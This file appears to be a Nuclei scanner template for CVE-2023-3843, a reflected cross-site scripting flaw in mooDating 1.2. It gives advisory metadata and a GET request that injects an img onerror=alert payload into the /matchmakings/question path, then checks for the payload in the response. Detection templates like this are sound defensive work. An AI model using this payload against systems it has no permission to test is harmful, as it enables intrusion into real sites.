41 lines
1.8 KiB
YAML
41 lines
1.8 KiB
YAML
id: CVE-2023-3843
|
|
|
|
info:
|
|
name: mooDating 1.2 - Cross-site scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51628
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3843
|
|
- https://vuldb.com/?ctiid.235194
|
|
- https://vuldb.com/?id.235194
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-3843
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00235
|
|
epss-percentile: 0.61597
|
|
cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: moosocial
|
|
product: moodating
|
|
tags: cve2023,cve,xss,unauth,exploitdb,moodating,moosocial
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 404'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
|
|
condition: and
|
|
# digest: 4a0a00473045022100f8e2700b8f5be675dc9f95b5ea57b298a1168058d65a5eca4293bdb3e2c29d8602203a7928ef43f783f95a42125895d5ef3073b7d99808f8989d5c24611901a67565:922c64590222798bb761d5b6d8e72950 |